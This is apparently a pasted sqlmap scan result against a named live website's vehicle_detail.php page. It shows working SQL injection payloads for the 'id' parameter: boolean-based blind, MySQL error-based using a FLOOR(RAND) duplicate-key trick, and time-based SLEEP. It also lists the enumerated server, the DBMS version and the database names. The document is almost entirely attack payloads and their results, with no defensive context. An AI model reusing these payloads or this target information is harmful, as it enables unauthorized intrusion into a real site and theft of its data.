http://lexani.com/lib/service/vehicle_detail.php?id=258
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=258 AND 5897=5897
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=258 AND (SELECT 6430 FROM(SELECT COUNT(*),CONCAT(0x71766b7871,(SELECT (ELT(6430=6430,1))),0x7176716a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: id=258 AND (SELECT * FROM (SELECT(SLEEP(5)))TPPL)
---
web application technology: Apache
back-end DBMS: MySQL 5.0
available databases [2]:
[*] devlexan_site
[*] information_schema